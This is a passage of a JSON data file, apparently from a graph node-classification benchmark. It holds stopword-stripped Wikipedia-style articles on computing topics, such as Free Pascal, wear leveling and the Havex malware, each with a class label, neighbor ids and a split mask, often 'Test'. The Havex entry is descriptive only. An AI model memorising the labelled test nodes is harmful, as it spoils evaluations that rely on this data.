closely coupled particular database management systems client–server computing implemented similar principles 1980s mixed success however recent years distributed client–server model become considerably difficult maintain number transactions grew response various online services especially web single distributed database practical solution addition online systems consist whole suite programs operating together opposed strict client–server model single server could handle transaction processing today number transaction processing systems available work inter-program level scale large systems including mainframes one effort x/open distributed transaction processing dtp see also java transaction api jta however proprietary transaction-processing environments ibm cics still popular although cics evolved include open industry standards well term extreme transaction processing xtp used describe transaction processing systems uncommonly challenging requirements particularly throughput requirements transactions per second systems may implemented via distributed cluster style architectures used least 2011",
    "neighbors": [
      9224,
      8201,
      3594,
      2068,
      1049,
      3609,
      9248,
      9762,
      8229,
      10793,
      10286,
      11324,
      1606,
      3142,
      2632,
      9286,
      9290,
      8788,
      10326,
      7767,
      2138,
      8282,
      4194,
      9828,
      10340,
      8808,
      2669,
      11377,
      6772,
      9335,
      8825,
      1146,
      3196,
      9343,
      11393,
      10389,
      4255,
      4263,
      10413,
      2222,
      10418,
      2740,
      9397,
      7868,
      6850,
      2246,
      206,
      731,
      2780,
      734,
      736,
      10471,
      6383,
      1776,
      7412,
      3323,
      5373,
      2304,
      9988,
      11024,
      8979,
      7446,
      11030,
      5401,
      5403,
      7461,
      2344,
      8502,
      10040,
      1341,
      8509,
      10048,
      2369,
      5441,
      5953,
      3398,
      3914,
      5452,
      2901,
      3414,
      10069,
      10072,
      8539,
      6494,
      9069,
      9075,
      6529,
      10632,
      11153,
      2456,
      9112,
      10137,
      7581,
      9631,
      9634,
      1447,
      7080,
      2477,
      4026,
      8122,
      3004,
      3517,
      3518,
      9663,
      11219,
      10201,
      987,
      4065,
      3560,
      5612,
      6124,
      2544,
      10737
    ],
    "mask": "Test"
  },
  {
    "node_id": 5659,
    "label": 2,
    "text": "Nokia_E70:nokia e70 nokia e70 candybar/fold keyboard type smartphone eseries range announced october 2005 released may 2006 two models phone e70-1 world market tri-band 900 1800 1900 mhz gsm umts e70-2 americas tri-band 850 1800 1900 mhz gsm edge packet data capability models use s60 platform 3rd edition top symbian os version 9.1 e70 business version/successor nokia 6800 series 6800 6810 6820 6822 nokia e70 aimed high-end professional market 16 million color screen 352×416 pixel totalling 146,432 pixels resolution e70 capable gsm wifi bluetooth connectivity sip voip functionality currently work firewall router configurations nokia made statement working implementing stun originally planned 2006 available e70-1 april 2012 turn ice also planned 2007 available june 2008 well advanced bluetooth capabilities phone capable connecting six devices simultaneously lacks a2dp support",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      8472,
      669,
      11545,
      10271,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      7214,
      690,
      10802,
      7220,
      821,
      9909,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      6996,
      7253,
      854,
      6870,
      10583,
      4569,
      10329,
      5211,
      6748,
      10332,
      737,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 5660,
    "label": 8,
    "text": "AWS_Elastic_Beanstalk:aws elastic beanstalk aws elastic beanstalk orchestration service offered amazon web services deploying applications orchestrates various aws services including ec2 s3 simple notification service sns cloudwatch autoscaling elastic load balancers elastic beanstalk provides additional layer abstraction bare server os users instead see pre-built combination os platform 64bit amazon linux 2014.03 v1.1.0 running ruby 2.0 puma 64bit debian jessie v2.0.7 running python 3.4 preconfigured docker deployment requires number components defined 'application logical container project 'version deployable build application executable 'configuration template contains configuration information beanstalk environment product finally 'environment combines 'version 'configuration deploys executables uploaded archive files s3 beforehand 'version pointer supported applications software stacks include application performance monitoring automatic upscaling downscaling better performance fault-tolerant applications robust security features user authentication increased availability application supported deployment methods include",
    "neighbors": [
      8962,
      8451,
      6027,
      7054,
      9245,
      11038,
      11556,
      6438,
      2217,
      5677,
      7983,
      10681,
      11201,
      8644,
      5960,
      10185,
      590,
      7248,
      1363,
      4439,
      7512,
      8921,
      2910,
      735,
      865,
      1001,
      8554,
      3573,
      8181
    ],
    "mask": "Test"
  },
  {
    "node_id": 5661,
    "label": 6,
    "text": "Wear_leveling:wear leveling wear leveling also written wear levelling technique prolonging service life kinds erasable computer storage media flash memory used solid-state drives ssds usb flash drives phase-change memory several wear leveling mechanisms provide varying levels longevity enhancement memory systems term preemptive wear leveling pwl used western digital describe preservation technique used hard disk drives hdds designed storing audio video data however hdds generally wear-leveled devices context article eeprom flash memory media individually erasable segments put limited number erase cycles becoming unreliable usually around 3,000/5,000 cycles many flash devices one block specially extended life 100,000+ cycles used flash memory controller track wear movement data across segments erasable optical media cd-rw dvd-rw rated 1,000 cycles 100,000 cycles dvd-ram media wear leveling attempts work around limitations arranging data erasures re-writes distributed evenly across medium way single erase block prematurely fails due high concentration write cycles flash memory single block chip designed longer life others memory controller store operational data less chance corruption conventional file systems fat ufs hfs ext2 ntfs originally designed magnetic disks rewrite many data structures directories repeatedly area systems used flash memory media becomes problem problem aggravated fact file systems track last-access times lead file metadata constantly rewritten in-place three basic types wear leveling mechanisms used flash memory storage devices flash memory storage system wear leveling last long data written flash without wear leveling underlying flash controller must permanently assign logical addresses operating system os physical addresses flash memory means every write previously written block must first read erased modified re-written location approach time-consuming frequently written locations wear quickly locations used blocks reach end life device becomes inoperable first type wear leveling called dynamic wear leveling uses map link logical block addresses lbas os physical flash memory time os writes replacement data map updated original physical block marked invalid data new block linked map entry time block data re-written flash memory written new location however flash memory blocks never get replacement data would sustain additional wear thus name comes dynamic data recycled device may last longer one wear leveling blocks still remaining active even though device longer operable type wear leveling called static wear leveling also uses map link lba physical memory addresses static wear leveling works dynamic wear leveling except static blocks change periodically moved low usage cells able used data rotational effect enables ssd continue operate blocks near end life also sometimes referred global wear leveling entire image leveled following table compares static dynamic wear leveling several techniques extending media life specialist secure digital cards techniques implemented hardware built-in microcontroller devices wear leveling transparent conventional file systems used as-is wear leveling also implemented software special-purpose file systems jffs2 yaffs flash media udf optical media three log-structured file systems treat media circular logs write sequential passes file systems implement copy-on-write strategies zfs also implement form wear leveling",
    "neighbors": [
      5120,
      1801,
      7818,
      2193,
      11667,
      2197,
      9762,
      5286,
      935,
      1193,
      9004,
      3629,
      6062,
      6575,
      7983,
      6961,
      8114,
      3124,
      8643,
      8772,
      5967,
      346,
      2395,
      6494,
      2015,
      6263,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 5662,
    "label": 7,
    "text": "OpenNebula_Systems:opennebula systems opennebula systems formerly c12g labs international software company develops provides commercial support open source cloud management platform opennebula.the company first established 2010 c12g labs based madrid c12g founded original developers opennebula october 15 2014 c12g announced would change name opennebula systems associating closely product may 2015 opennebula systems created subsidiary us opennebula systems usa llc located cambridge massachusetts",
    "neighbors": [
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      8986,
      6307,
      9766,
      5159,
      6444,
      8495,
      3121,
      7352,
      2496,
      4289,
      1224,
      8520,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5663,
    "label": 9,
    "text": "Free_Pascal:free pascal free pascal compiler fpc compiler closely related programming-language dialects pascal object pascal free software released gnu general public license exception clauses allow static linking runtime libraries packages purpose combination software license supports object pascal dialect well dialects several pascal family compilers certain extent including turbo pascal delphi historical macintosh compilers dialect selected per-unit module basis one dialect used per program follows write compile anywhere philosophy available many cpu architectures operating systems see targets supports inline assembly language includes internal assembler capable parsing several dialects intel style separate projects exist facilitate developing cross-platform graphical user interface gui applications prominent one lazarus integrated development environment ide initially free pascal adopted de facto standard dialect pascal programmers borland pascal later adopted delphi version 2.0 delphi compatibility continuously implemented improved project compilation mode concept developers made clear would incorporate working patches standardized dialects american national standards institute ansi international organization standardization iso create standards-compliant mode small effort made support apple pascal syntax ease interfacing classic mac os macos since apple dialect implements standard pascal features turbo pascal delphi omit free pascal bit iso-compatible 2.2 x release series significantly change dialect objectives beyond roughly delphi 7 level syntax instead aiming closer compatibility notable exception addition support generics free pascal version 2.2.0 several years supported capacity delphi several delphi 2006-specific features added development branch starting work features new delphi 2009 notably addition codice_1 type completed development branch also features objective-pascal extension objective-c cocoa interfacing version 2.7.1 free pascal implemented basic iso pascal mode though many things codice_2 codice_3 procedure file-buffer variable concept file handling still absent version 3.0.0 iso pascal mode fairly complete one remaining bug since fixed trunk branch able compile standardpascal.org p5 iso pascal compiler changes free pascal created borland clarified borland pascal development dos would stop version 7 replaced windows-only product later became delphi student florian paul klämpfl began developing compiler written turbo pascal dialect produced 32-bit code go32v1 dos extender used developed dj gnu programming platform djgpp project time originally compiler 16-bit dos executable compiled turbo pascal two years compiler able compile became 32-bit executable initial 32-bit compiler published internet first contributors joined project later linux port created michael van canneyt five years borland kylix compiler became available dos port adapted use os/2 using eberhard mattes extender emx made os/2 second supported compiling target well florian klämpfl original author daniël mantione also contributed significantly make happen providing original port run-time library os/2 emx compiler improved gradually dos version migrated go32v2 extender culminated release 0.99.5 much widely used prior versions last release aiming turbo pascal compliance later releases added delphi compatibility mode release also ported systems using motorola 68000 family m68k processors release 0.99.8 win32 target added start made incorporating delphi features stabilizing non-beta release began version 1.0 released july 2000 1.0 x series widely used business education 1.0 x releases port 68k cpu redone compiler produced stable code several 68k unix-like amigaos operating systems stabilization would become 1.0 x also porting motorola 68k systems clear design code generator far limited many aspects principal problems adding processors meant rewriting code generator register allocation based principle always keeping three free registers building blocks inflexible difficult maintain reasons 1.1 x series branched 1.0 x main branch december 1999 first changes mostly clean-ups rewrite-redesigns parts compiler code generator register allocator also rewritten remaining missing delphi compatibility added work 1.1.x continued slowly steadily late 2003 working powerpc port became available followed arm port summer 2004 sparc port fall 2004 x86-64-amd64 port early 2004 made compiler available 64-bit platform november 2003 first beta release 1.1 x branch packaged numbered 1.9.0 quickly followed versions 1.9.2 1.9.4 latter introduced os x support work continued version 1.9.6 january 2005 1.9.8 late february 2005 2.0.0 may 2005 2.0.2 december 2005 2.0.4 august 2006 2006 major reworks planned 2.2 rewrite unit system still begun decided instead start stabilizing already implemented features motives roadmap change needs lazarus integrated development environment project particularly internal linker support win64 windows ce os x x86 related features like dwarf betas 2.1.2 2.1.4 version 2.2.0 released september 2007 followed version 2.2.2 august 2008 version 2.2.4 march 2009 2.2 x series vastly improved support activex component object model com interface object linking embedding ole though bugs still found delegation interface using codice_4 keyword partly implemented complete library support activex also improved another major feature internal linker win32 win64 windows ce greatly improveď linking time memory use make compile-link-run cycle lazarus much faster efficiency smart-linking dead code elimination also improved minor new features included improved dwarf 2/3 debug format support optimizations tail recursion omission unneeded stack frames register-based common subexpression elimination cse optimization first implementation generic programming generics support also became available experimentally 2.4.x release series less clear set goals earlier releases unit system rewrite postponed branch became 2.4 created keep risky commits 2.2 stabilize mostly risky commits involved improvements new platforms mac powerpc 64 mac x86-64 iphone many fixes arm x86-64 architectures general well dwarf compiler improvements included whole program optimization wpo devirtualization arm embedded-application binary interface eabi support later 2.2 cycle delphi-like resource support based special sections binary instead pascal constants added feature direly needed lazarus became main highlight branch minor additions memory manager improved heap manager performance threaded environments small improvements delphi compatibility codice_5 improvements interface delegation january 1 2010 free pascal 2.4.0 released followed november 13 2010 bug fix release 2.4.2 support codice_6 loops codice_7 codice_8 classes changes january 2012 free pascal 2.6 released first version 2.6 release series also supported objective pascal os x ios targets implemented many small improvements bug fixes february 2013 fpc 2.6.2 released contained netbsd openbsd releases first time since 1.0.10 based fresh ports march 2014 last point release 2.6 series 2.6.4 launched featuring mostly database fcl-db updates. br version 3.0.0 released november 25 2015 first major release since january 1 2012 contains many new language features fpc new features 3.0 version 3.0.2 released february 15 2017 includes bug fixes minor compiler updates. br version 3.0.4 released november 28 2017. br includes many language improvements previous versions like internal linker executable linkable format elf arm aarch64 ios linux revived i8086 platform extended libraries much free pascal also supports byte code generation java virtual machine version 3.0.0 targets oracle java google android jvm although object pascal syntax fully supported free pascal 3.0.0 also supports armhf platforms like raspberry pi including armv6-eabihf running raspbian mips work 64-bit arm resulted support ios 3.0.0 well native arm android target added ending formerly hacked arm linux target generate native arm libraries android makes porting lazarus applications android using custom drawn interface easier since fpc 2.6.2 openbsd netbsd supported ia32 x86_64 architectures new target embedded added usage without os arm cortex mips mainly instantfpc possible run pascal programs translated time unix scripts cgi back-end like modern compilers free pascal used integrated development environment ide besides independent ides also plugins various existing ides apart compiler ide free pascal provides following libraries",
    "neighbors": [
      512,
      6154,
      1556,
      546,
      5154,
      3114,
      5684,
      9272,
      576,
      7234,
      585,
      1101,
      2658,
      10851,
      9320,
      8303,
      1145,
      5754,
      6797,
      11411,
      3734,
      682,
      2224,
      4791,
      11447,
      7355,
      1724,
      8385,
      6338,
      8909,
      10971,
      10470,
      5356,
      9964,
      10478,
      5872,
      2290,
      4341,
      9981,
      6910,
      8973,
      6414,
      5397,
      10537,
      10026,
      10029,
      303,
      2864,
      7983,
      9008,
      823,
      4919,
      1849,
      7479,
      8510,
      321,
      833,
      6979,
      8524,
      10584,
      10586,
      4446,
      1399,
      3969,
      3462,
      8082,
      3990,
      6558,
      1952,
      5546,
      428,
      2485,
      8147,
      477,
      5612,
      499,
      10739,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5664,
    "label": 5,
    "text": "Chirp_spread_spectrum:chirp spread spectrum digital communications chirp spread spectrum css spread spectrum technique uses wideband linear frequency modulated chirp pulses encode information chirp sinusoidal signal frequency increase decrease time often polynomial expression relationship time frequency picture example upchirp frequency increases linearly time sometimes frequency upchirps increase exponentially time spread spectrum methods chirp spread spectrum uses entire allocated bandwidth broadcast signal making robust channel noise chirps utilize broad band spectrum chirp spread spectrum also resistant multi-path fading even operating low power however unlike direct-sequence spread spectrum dsss frequency-hopping spread spectrum fhss add pseudo-random elements signal help distinguish noise channel instead relying linear nature chirp pulse additionally chirp spread spectrum resistant doppler effect typical mobile radio applications chirp spread spectrum originally designed compete ultra-wideband precision ranging low-rate wireless networks 2.45 ghz band however since release ieee 802.15.4a also known ieee 802.15.4a-2007 longer actively considered ieee standardization area precision ranging chirp spread spectrum ideal applications requiring low power usage needing relatively low data rates 1 mbit/s less particular ieee 802.15.4a specifies css technique use low-rate wireless personal area networks lr-wpan however whereas ieee 802.15.4-2006 standard specifies wpans encompass area 10 less ieee 802.15.4a-2007 specifies css physical layer used longer ranges devices moving high speeds part network nanotron css implementation actually seen work range 570 meters devices nanotron implementation work data rates 2 mbit/s higher specified 802.15.4a finally ieee 802.15.4a phy standard actually mixes css encoding techniques differential phase shift keying modulation dpsk achieve better data rates chirp spread spectrum may also used future military applications difficult detect intercept operating low power similar frequency swept waveforms used frequency modulated continuous wave radars measure range distance unmodulated continuous wave doppler radar measure range-rate relative velocity along line sight fm-cw radars widely used radio altimeters aircraft",
    "neighbors": [
      11267,
      3847,
      9863,
      2057,
      10381,
      1550,
      2968,
      2458,
      5020,
      11686,
      7723,
      11181,
      1969,
      2994,
      5304,
      7490,
      3140,
      7108,
      11591,
      5321,
      7498,
      3040,
      1121,
      3168,
      8160,
      2920,
      7400,
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 5665,
    "label": 4,
    "text": "Havex:havex havex malware also known backdoor.oldrea rat employed russian attributed apt group “ energetic bear ” “ dragonfly havex discovered 2013 one five known ics tailored malware developed past decade malwares include stuxnet blackenergy industroyer/crashoveride triton/trisis energetic bear began utilizing havex widespread espionage campaign targeting energy aviation pharmaceutical defense petrochemical sectors campaign targeted victims primarily united states europe havex malware discovered researchers cybersecurity researchers f-secure symantec reported ics-cert utilizing information firms 2014 ics-cert alert reported analyzing new malware campaign targeting ics equipment via several attack vectors using opc conduct reconnaissance industrial equipment target network havex malware two primary components rat c c server written php havex also includes opc open platform communications scanning module used search industrial devices network opc scanning module designed scan tcp devices operating ports 44818 105 502 researchers sans noted ports common ics/scada companies siemens rockwell automation abusing opc protocol havex mapped industrial networks inside victim systems researchers note opc scanning module operated older dcom-based distributed component object model opc standard recent opc unified architecture ua havex joins category ics tailored malware written conduct information gathering specific systems havex also exploited supply chain watering-hole attacks ics vendor websites addition spear phishing campaigns gain access victim systems.the watering-hole supply chain attacks twofold methodology first method victims redirected legitimate vendor websites corrupted pages containing havex malware second method attackers compromised vulnerable vendor websites corrupted legitimate software inject havex rat users would unknowingly download malware downloading otherwise legitimate software vendor websites.this method allowed malware bypass traditional security measure software downloaded users authorization install programs onto network known compromised vendors mesa imaging ewon/talk2m mb connect line attack vectors aimed business networks lack robust airgaps many ics environments could allow malware like havex jump easily business networks industrial networks infect ics/scada equipment havex like backdoor malwares also allows injection malicious code onto victim devices specifically havex often used inject karagany payload onto compromised devices karagany could steal credentials take screenshots transfer files dragonfly c c servers dragonfly group utilized havex malware espionage campaign energy aviation pharmaceutical defense petrochemical victims primarily united states europe cybersecurity researchers dragos estimated campaign targeted 2,000 sites regions sectors researchers symantec observed havex malware began seeking energy infrastructure targets initially targeting us canadian defense aviation sectors discovery process researchers examined 146 c c servers associated havex campaign 88 variants malware havex infected systems via watering hole attacks redirecting users malicious websites corrupted websites campaign used lightsout hello exploit kits infect systems havex karagany trojans lightsout exploit kit abused java browser vulnerabilities deliver havex karagany payloads hello exploit kit updated version lightsout exploit kit came use 2013 updated hello exploit kit uses footprinting determine target os versions fonts browser add-ons user information information gathered exploit kit redirects victim malicious url based efficient exploits gain access target",
    "neighbors": [
      2945,
      9537,
      3843,
      9569,
      10024,
      971,
      11662,
      4081,
      11607,
      5337
    ],
    "mask": "Test"
  },
  {
    "node_id": 5666,
    "label": 7,
    "text": "Microsoft_Azure_Web_Sites:microsoft azure web sites microsoft azure web sites cloud computing based platform hosting websites created operated microsoft microsoft azure web sites platform service paas allows publishing web apps running multiple frameworks written different programming languages .net node.js php python java including microsoft proprietary ones 3rd party ones microsoft azure web sites became available first preview version june 2012 official version general availability announced june 2013 microsoft azure web sites originally named windows azure web sites renamed part re-branding move across azure march 2014 subsequently renamed app services march 2015 microsoft azure web sites web-hosting platform supports multiple technologies programming languages .net node.js php python users microsoft azure subscriptions create websites deploy content code web sites microsoft azure web sites supports website creation wizard allows user create blank site create site based one several available pre-configured images website gallery part creating website site url assigned subdomain azurewebsites.net various for-pay tiers website assigned one custom domains implemented setting cname record dns server hosts user domain zone point user web site hosted azure for-pay tiers user added option uploading ssl certificate configuring site bound https site created user add modify content using multiple deployment methods including web deploy msdeploy tfs via visual studio ftp ftps webmatrix codeplex github dropbox bitbucket mercurial local git features azure web sites microsoft azure web sites implemented websites dynamically created on-demand servers running windows server 2012 iis 8.0 client posts request web site microsoft azure web sites dynamically provisions site one azure virtual machines pointing content stored azure storage containers azure virtual machines deployed groups called stamps may contain hundreds machines microsoft deploys stamps azure data centers across world adds stamps demand grows azure web sites services offered 4 tiers entry-level tier free tier free tier supports 10 websites 1 gb content storage limited 165 mb daily data egress first for-pay tier shared tier shared tier sites support custom domains scaled 6 instances current highest for-pay tier standard tier standard tier websites run vms dedicated exclusively single customer websites standard tier supports ssl sni ip-based scaling 10 instances file storage 50 gb content basic standard tier websites deployed 3 sizes virtual machines small vms 1 virtual cpu 1.75gb ram medium vms 2 virtual cpus 3.5 gb ram large vms 4 virtual cpus 7gb available ram microsoft initially offered basic web hosting service part office live small business launched late 2007 office live small business offered customers free commercial web hosting built-in system creating websites based build-in templates site creation wizard microsoft started allocating resources developing numerous cloud solutions group formed microsoft azure develop microsoft azure web sites microsoft azure web sites announced june 2012 preview release parallel microsoft developed microsoft azure pack offers technology installed private-cloud sets servers customer site direct customer control mid-2013 microsoft azure web sites microsoft azure pack officially released public microsoft operates microsoft azure number data centers throughout world microsoft azure web sites available subset deploying websites microsoft azure web sites customers choose deploy sites data center following geographical regions east us north central us west us east asia brazil south north europe west europe japan east japan west east asia",
    "neighbors": [
      2945,
      4356,
      11524,
      4236,
      6797,
      782,
      911,
      1935,
      4623,
      8592,
      9744,
      10893,
      2965,
      10900,
      2328,
      4377,
      8986,
      11549,
      7970,
      6307,
      9766,
      5159,
      1832,
      6827,
      6444,
      5677,
      11693,
      7983,
      8495,
      3121,
      3890,
      8757,
      7352,
      2496,
      4289,
      7364,
      8644,
      1224,
      8520,
      9033,
      4429,
      10957,
      7248,
      2641,
      1362,
      467,
      2004,
      4051,
      9682,
      4439,
      11221,
      11605,
      6367,
      4704,
      11103,
      4194,
      10338,
      5732,
      11646,
      617,
      8554,
      3819,
      7660,
      8681,
      10090,
      3573,
      9974,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 5667,
    "label": 0,
    "text": "PropBank:propbank propbank corpus annotated verbal propositions arguments—a proposition bank although propbank refers specific corpus produced martha palmer et al term propbank also coming used common noun referring corpus annotated propositions arguments propbank project played role recent research natural language processing used semantic role labelling propbank differs framenet resource frequently compared several ways propbank verb-oriented resource framenet centered abstract notion frames generalizes descriptions across similar verbs e.g describe characterize well nouns words e.g description propbank annotate events states affairs described using nouns propbank commits annotating verbs corpus whereas framenet project chooses sets example sentences large corpus cases annotated longer continuous stretches text propbank-style annotations often remain close syntactic level framenet-style annotations sometimes semantically motivated start propbank developed idea serving training data machine learning-based semantic role labeling systems mind requires arguments verb syntactic constituents different senses word distinguished differences bear arguments due differences semantic role labeling respect propbank often somewhat easier task producing framenet-style annotations",
    "neighbors": [
      3617,
      1890,
      7780,
      5639,
      3721,
      9577,
      4971,
      5903,
      7599,
      10160,
      10610,
      1460,
      6174,
      5214
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5668,
    "label": 0,
    "text": "LIVAC_Synchronous_Corpus:livac synchronous corpus livac uncommon language corpus dynamically maintained since 1995 different existing corpora livac adopted rigorous regular well windows approach processing filtering massive media texts representative communities pan-chinese region including hong kong macau taipei singapore shanghai beijing guangzhou shenzhen contents thus deliberately repetitive cases represented textual samples drawn editorials local international news cross-formosan straits news well news finance sports entertainment 2017 2.5 billion characters news media texts filtered far 600 million characters processed analyzed yielded expanding pan-chinese dictionary 2 million words pan-chinese printed media rigorous analysis based computational methodology livac time accumulated large amount accurate meaningful statistical data chinese language speech communities pan-chinese region result shows considerable important variations windows approach representative feature livac enabled pan-chinese media texts quantitatively analyzed according various attributes locations time subject domains thus various types comparative studies applications information technology well development often related innovative applications possible moreover livac allowed longitudinal developments taken account facilitating key word context kwic comprehensive study target words underlying concepts well linguistic structures past 20 years based variables region duration content results extensive accumulative data analysis contained livac enabled cultivation textual databases proper names place names organization names new words bi-weekly annual rosters media figures related applications included establishment verb adjective databases formulation sentiment indices related opinion mining measure compare popularity global media figures chinese media livac annual pan-chinese celebrity rosters later renamed pan-chinese media personalities rosters construction monthly new word lexicons livac annual pan-chinese new word rosters basis analysis emergence diffusion transformation new words publication dictionaries neologisms made possible",
    "neighbors": [
      5612,
      7983,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 5669,
    "label": 1,
    "text": "Quick_Objects:quick objects quick objects powerful object-relational mapping tool microsoft .net framework built framework business logic validation architecture quick objects different orm tools see list object-relational mapping software focus quick objects provide advantages code reuse code generation object relational mapping single tool set quick objects api simple packed powerful features capabilities linq fully supported used supported databases classes generated quick objects ready web services windows communication foundation remoting comprehensive data access modification capabilities complemented flexible object model allows developer specify control every aspect crud operations see list features september 15 2008 version 4.2 released enhanced support windows forms visual databinding september 1 2008 version 4.1 released support microsoft .net compact framework august 1 2008 version 4.0 released several new features vistadb microsoft access mysql added list supported databases quick objects designer added support adding multiple custom templates code generation v4.0 also added support linq enabled capability specify queries linq run supported databases april 7 2008 version 3.5 released new free edition product called community edition addition community edition quick objects designer also added visual validation designer business logic framework also introduced support databases multiple schemas introduced support aggregate sub queries march 3 2008 version 3.3 released support visual studio 2008 october 30 2007 major release quick objects v3 released addition validation framework among features v3 also introduced support disconnected mode delayed synchronization new component called quick objects data source asp.net introduced v3 well april 25 2007 quick objects version 2.2 released public",
    "neighbors": [
      7523,
      10020,
      10340,
      3080,
      2603,
      6797,
      7022,
      7983,
      9467,
      10413,
      3573,
      11030,
      5403
    ],
    "mask": "Test"
  },
  {
    "node_id": 5670,
    "label": 2,
    "text": "Slapt-get:slapt-get slapt-get apt-like package management system slackware slapt-get tries emulate features debian codice_1 closely possible released terms gnu general public license slapt-get free software slapt-get builds functionality top native slackware package tools installpkg upgradepkg removepkg enabling package query remote fetching system updates integrated changelog information many optional advanced features dependency resolution package conflicts suggestions checksum public key verification transfer resumption slapt-get uses libcurl curl library transport libcurl provides support ftp ftps http https file // resource types along transfer resume incomplete downloads slapt-get also uses gnu privacy guard library validate signatures slapt-get provides simple configuration file format includes exclusion mechanism use system upgrade option well declarations desired package sources package source optionally tagged specific priority order override package version comparison honor upstream software downgrades might case slackware reverts previous version package slapt-get provide dependency resolution packages included within slackware distribution however provide framework dependency resolution slackware compatible packages similar fashion hand-tuned method apt utilizes several package sources slackware based distributions take advantage functionality hard soft conditional dependencies along package conflicts complementary package suggestions expressed using slapt-get framework adding dependency information requires modification packages rather package listing file packages.txt used specify relationships file provided patrick volkerding similar packages.gz file use debian several scripts available generate packages.txt file group packages file format used patrick volkerding extended adding extra lines per package slapt-get parses file source downloads typically third party packages store dependency information within package later extraction packages.txt inclusion information within slackware package format inhibit ability slackware pkgtools install packages information silently ignored discarded package installed slapt-get works official slackware mirrors third party package repositories http //www.slacky.eu/ slapt-get looks support files packages.txt checksums.md5 repository package information files provide package names versions sizes compressed uncompressed checksums well package description files extended discussed previous section add dependency listings conflict information package suggestions files also proxy remote sources specifying mirror declaration package gslapt gtk+ frontend libslapt slapt-get library provides advanced package management slackware derivatives inspired functionality present synaptic gslapt aims bring ease use enjoyed debian derivatives slackware world gslapt written primarily supersede vlapt x dialog slapt-get frontend used vectorlinux besides slackware slapt-get gslapt included several distributions including",
    "neighbors": [
      2050,
      11525,
      2310,
      10760,
      7689,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      657,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      10149,
      4775,
      7847,
      6828,
      6446,
      7983,
      10033,
      1842,
      948,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      7293,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      4841,
      6119,
      9063,
      9324,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5671,
    "label": 3,
    "text": "Micro_T-Kernel:micro t-kernel μt-kernel real-time operating system rtos designed 16- 8-bit microcontrollers μt-kernel standardized t-engine forum later ieee basis ieee 2050-2018 article comparing 9 rtoss among micro t-kernel evaluated given favorable remarks appeared ieee publication",
    "neighbors": [
      8708,
      7045,
      7049,
      5270,
      9366,
      6187,
      4396,
      7983,
      3762,
      434,
      11321,
      5439,
      3780,
      10332,
      4581,
      5863,
      11125,
      6904,
      8828,
      3838
    ],
    "mask": "None"
  },
  {
    "node_id": 5672,
    "label": 4,
    "text": "Derek_Atkins:derek atkins derek atkins computer scientist specializing computer security studied electrical engineering computer science massachusetts institute technology june 2014 became chief technology officer securerf atkins author co-author several computer security books including internet security professional reference reputational risk question trust april 1994 co-authored paper magic words squeamish ossifrage detailing factorization rsa-129",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 5673,
    "label": 2,
    "text": "Microsoft_Baseline_Security_Analyzer:microsoft baseline security analyzer microsoft baseline security analyzer mbsa discontinued software tool longer available microsoft determines security state assessing missing security updates less-secure security settings within microsoft windows windows components internet explorer iis web server products microsoft sql server microsoft office macro settings security updates determined current version mbsa using windows update agent present windows computers since windows 2000 service pack 3 less-secure settings often called vulnerability assessment va checks assessed based hard-coded set registry file checks example va might permissions one directories /www/root folder iis could set low level allowing unwanted modification files outsiders versions 1.2.1 run nt4 windows 2000 windows xp windows server 2003 provide support iis versions 5 6 sql server 7 2000 internet explorer 5.01 6.0 microsoft office 2000 2003 security update assessment provided integrated version shavlik hfnetchk 3.8 scan tool mbsa 1.2.1 localized english german french japanese versions supported security assessment locale version 2.0 retained hard-coded va checks replaced shavlik security assessment engine microsoft update technologies adds dynamic support microsoft products supported microsoft update mbsa 2.0.1 released support revised windows update wu offline scan file wsusscn2.cab mbsa 2.1 added vista windows server 2008 support new vista-styled gui interface support latest windows update agent 3.0 new remote directory /rd feature extended va checks x64 platforms august 2012 security bulletin webcast q technet announced current version mbsa 2.2 support windows 8 microsoft currently plans release updated version tool november 2013 mbsa 2.3 released release adds support windows 8 windows 8.1 windows server 2012 windows server 2012 r2 windows 2000 longer supported release microsoft support updates mbsa ended current version 2.3 offer official support windows 10 windows server 2016 microsoft mbsa webpage removed mbsa scans 3 classes updates security updates service packs update rollups critical optional updates left aside",
    "neighbors": [
      8576,
      5380,
      2309,
      1417,
      2443,
      6797,
      11030,
      537,
      3482,
      5799,
      7983,
      7473,
      5057,
      10828,
      10322,
      4439,
      5082,
      3935,
      9695,
      225,
      4074,
      5356,
      11248,
      8315,
      2558,
      383
    ],
    "mask": "Test"
  },
  {
    "node_id": 5674,
    "label": 4,
